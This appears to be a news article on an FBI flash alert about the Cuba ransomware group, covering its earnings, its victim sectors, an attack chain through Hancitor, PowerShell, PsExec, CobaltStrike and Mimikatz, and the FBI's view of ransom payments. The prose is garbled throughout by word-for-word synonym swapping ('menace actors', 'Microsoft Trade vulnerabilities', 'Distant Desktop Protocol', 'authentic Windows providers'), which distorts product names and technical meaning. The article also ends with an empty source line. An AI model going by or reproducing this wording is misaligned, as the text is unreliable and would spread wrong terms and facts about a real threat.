The menace actors driving the Cuba ransomware variant have now amassed $44m by way of concentrating on of at least 49 victims, in accordance to the FBI.
The bureau’s hottest ‘flash’ alert exposed that the team experienced demanded at the very least $74m from its victims. These victims frequently appear from critical infrastructure sectors like monetary, government, health care, production, and IT.
“Cuba ransomware is dispersed by way of Hancitor malware, a loader identified for dropping or executing stealers, these types of as Remote Access Trojans (RATs) and other forms of ransomware, onto victims’ networks,” the FBI defined.
“Hancitor malware actors use phishing email messages, Microsoft Trade vulnerabilities, compromised credentials, or respectable Distant Desktop Protocol (RDP) resources to acquire original obtain to a victim’s network. Subsequently, Cuba ransomware actors use authentic Windows providers — such as PowerShell, PsExec, and other unspecified solutions — and then leverage Windows admin privileges to execute their ransomware and other procedures remotely.”
Following a compromise, the ransomware will set up and execute a CobaltStrike beacon as a support on the victim’s network through PowerShell. It also makes use of MimiKatz malware to steal RDP credentials and hijack consumer accounts, the report claimed.
The FBI took a notably softer line in the alert on organizations that go versus its guidance and shell out their extorters. The bureau claimed it “understands” if corporate victims have to interact with their attackers in order to guard shareholders, prospects and staff.
However, it urged corporations to report any incidents to the FBI, even if they do pay out-up, as this provides invaluable facts to avoid foreseeable future attacks and empower monitoring of critical teams.
“The FBI is trying to find any info that can be shared, to include things like boundary logs exhibiting interaction to and from foreign IP addresses, Bitcoin wallet details, the decryptor file, and/or a benign sample of an encrypted file,” it claimed of the Cuba variant.
It is thought that Cuba has been lively considering the fact that January 2020.
Some parts of this article are sourced from: